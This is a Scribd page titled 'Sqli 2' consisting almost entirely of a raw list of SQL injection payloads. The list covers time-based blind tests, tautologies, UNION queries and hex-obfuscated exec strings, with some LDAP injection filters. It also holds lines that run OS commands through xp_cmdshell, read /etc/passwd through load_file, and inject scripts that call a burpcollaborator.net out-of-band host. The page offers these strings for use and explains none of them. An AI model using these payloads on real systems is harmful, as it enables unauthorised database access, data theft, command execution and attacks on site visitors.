Scribd
Upload
3 views7 pages

Sqli 2

The document contains a series of SQL injection attack strings that utilize various techniques to manipulate database queries. These include commands for delaying execution, checking conditions, and attempting to extract sensitive information. The patterns indicate an attempt to exploit vulnerabilities in web applications that interact with databases.

Uploaded by

sagardhakal.kaon
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
3 views7 pages

Sqli 2

The document contains a series of SQL injection attack strings that utilize various techniques to manipulate database queries. These include commands for delaying execution, checking conditions, and attempting to extract sensitive information. The patterns indicate an attempt to exploit vulnerabilities in web applications that interact with databases.

Uploaded by

sagardhakal.kaon
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

admin'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))--

-6513%27%20OR%20%28SELECT%20INSTR2%28NULL%2CNULL%29%20FROM%20DUAL%29%20IS%20NULL--
%20SpSw
admin%20waitfor%20delay%20'0:0:15'%20--%20
admin%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20
admin%20OR%202%2B669-669-1=0%2B0%2B0%2B1
admin"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20
'xor(if(now()=sysdate(),sleep(30),0))or

[email protected]'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C
%7CCHR(98)%2C15)%7C%7C'
orwa(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)
%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
if(now()=sysdate()%2Csleep(15)%2C0)
admin';%20waitfor%20delay%20'0:0:15'%20--%20
admin'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))--
admin')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))--
1%00%C0%A7%C0%A2%252527%252522
admin'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C%7CCHR(98)%2C15)%7C
%7C'
(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)
%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
gGBw={vsCx}&firc=<
orwa';%20waitfor%20delay%20'0:0:15'%20--%20
if(now()=sysdate()%2Csleep(15)%2C0)
c4aQYcql
1%20waitfor%20delay%20'0:0:15'%20--%20
1%20waitfor%20delay%20'0:0:15'%20--%20
1%00%C0%A7%C0%A2%252527%252522
0%27XOR(if(now()=sysdate(),sleep(11),0))XOR%27Z
orwa'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
orwa"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
orwa-1"%20OR%202%2B804-804-1=0%2B0%2B0%2B1%20--%20
(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)
%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
%40%40KFdwo
u]H[ww6KrA9F.x-F'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C
%7CCHR(98)%2C15)%7C%7C'
[email protected]'%7C%7CDBMS_PIPE.RECEIVE_MESSAGE(CHR(98)%7C%7CCHR(98)%7C
%7CCHR(98)%2C15)%7C%7C'
orwa%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20
admin');%20waitfor%20delay%20'0:0:9'
'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or
orwa')%20OR%20565=(SELECT%20565%20FROM%20PG_SLEEP(15))--
orwa'%20OR%20227=(SELECT%20227%20FROM%20PG_SLEEP(15))--
orwa';%20waitfor%20delay%20'0:0:15'%20--%20
1%20AND%20(SELECT%208603%20FROM%20(SELECT(SLEEP(10)))xMdQ)
xx49236287'%20or%208896=8896--
1)%20OR%20ELT(2023=2023,SLEEP(5))#
orwa'%20OR%201=1--
(SELECT%20(CASE%20WHEN%20(9967=9967)%20THEN%2010%20ELSE%20(SELECT%204619%20UNION
%20SELECT%207284)%20END))
10%20AND%20(SELECT%201030%20FROM(SELECT%20COUNT(*),CONCAT(0x7176717071,(SELECT
%20(ELT(1030=1030,1))),0x7176717871,FLOOR(RAND(0)*2))x%20FROM
%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)
10%20AND%20(SELECT%204814%20FROM%20(SELECT(SLEEP(5)))jQqq)
10%20UNION%20ALL%20SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0
x7176717071,0x6a70787a43525a4e7563646951517a696944624150465361476541455147435a536c7
75142586976,0x7176717871)-- -
+or+sleep(0.2)%23)
-1;%20waitfor%20delay%20'0:0:10'%20--%20
if(now()=sysdate()%2Csleep(15)%2C0)
Be7BtCuD'))%20OR%20335=(SELECT%20335%20FROM%20PG_SLEEP(15))--
20PVEY5L
orwa'"
1;SELECT IF((8303>8302),SLEEP(13),2356)#
orwa%27;%20waitfor%20delay%20%270:0:5%27%20--%20
orwa%27);%20waitfor%20delay%20%270:0:6%27%20--%20
1%20waitfor%20delay%20'0:0:15'%20--%20
1%00%C0%A7%C0%A2%252527%252522
0'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
0"XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR"Z
-1'%20OR%202%2B388-388-1=0%2B0%2B0%2B1%20--%20
-1'%20OR%202%2B251-251-1=0%2B0%2B0%2B1%20or%20'4dbGgO0h'='
-1%20OR%202%2B949-949-1=0%2B0%2B0%2B1%20--%20
-1%20OR%202%2B669-669-1=0%2B0%2B0%2B1
-1"%20OR%202%2B764-764-1=0%2B0%2B0%2B1%20--%20
(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)
%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
(select(0)from(select(sleep(15)))v)/*'%2B(select(0)from(select(sleep(15)))v)
%2B'"%2B(select(0)from(select(sleep(15)))v)%2B"*/
%40%408orwa
)%20or%20('x'='x
%20or%201=1
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+
(select(0)from(select(sleep(6)))v)+"*/
orwa';%20waitfor%20delay%20'0:0:6'%20--%20
orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--
(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+
(select(0)from(select(sleep(13)))v)+\"*/
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
1' OR NOT 2470=2470-- Ontu
' WAITFOR DELAY '0:0:5'--
';WAITFOR DELAY '0:0:5'--
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
or 0=0 #
insert
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
# from wapiti
or 0=0 --
1 waitfor delay '0:0:10'--
or 'a'='a
hi or 1=1 --"
or a = a
UNION ALL SELECT
) or sleep(__TIME__)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
or 1=1
or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
or 3=3
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
or 1=1
and 1 in (select var from temp)--
or '7659'='7659
or 'text' = n'text'
--
or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
&
admin' or '
or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
"));waitfor delay '0:0:__TIME__'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
or 1=1--
and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
union all select @@version--
,@variable
(sqlattempt2)
or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
or pg_sleep(__TIME__)--
hi' or 'x'='x';
") or sleep(__TIME__)="
or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
union select
or sleep(__TIME__)#
select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
or 2 between 1 and 3
or a=a--
or '1'='1
|
or sleep(__TIME__)='
or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
‘ or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
having 1=1--
) or benchmark(10000000,MD5(1))#
or username like char(37);
;waitfor delay '0:0:__TIME__'--
" or 1=1--
x' AND userid IS NULL; --
*/*
or 'text' > 't'
(select top 1
or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:__TIME__'--
a' or 3=3--
-- &password=
group by userid having 1=1--
or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(__TIME__)--
%20or%20'x'='x
or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
&apos;%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(__TIME__)#
or 0=0 #
select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
") or benchmark(10000000,MD5(1))#
UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
or 1 in (select @@version)--
sqlvuln;
union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
‘ or 3=3 --
@variable
or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(__TIME__)--
?
or 1/*
!
'
or a = a
declare @q nvarchar (200) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003
000270000 exec(@q)
declare @s varchar(200) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
# or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
# or 3=3 --
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
"><script src=//xxx.burpcollaborator.net></script>
0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z
; DECLARE @command varchar(255); SELECT @command='ping xxx.burpcollaborator.net';
EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP'
</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/
script/.source),s.stack=Error().stack,s.src=(/,/+/
xxx.burpcollaborator.net/).slice(2),document.documentElement.appendChild(s))//'>
%3C%22img src='https://xxx.burpcollaborator.net'%22%3E

You might also like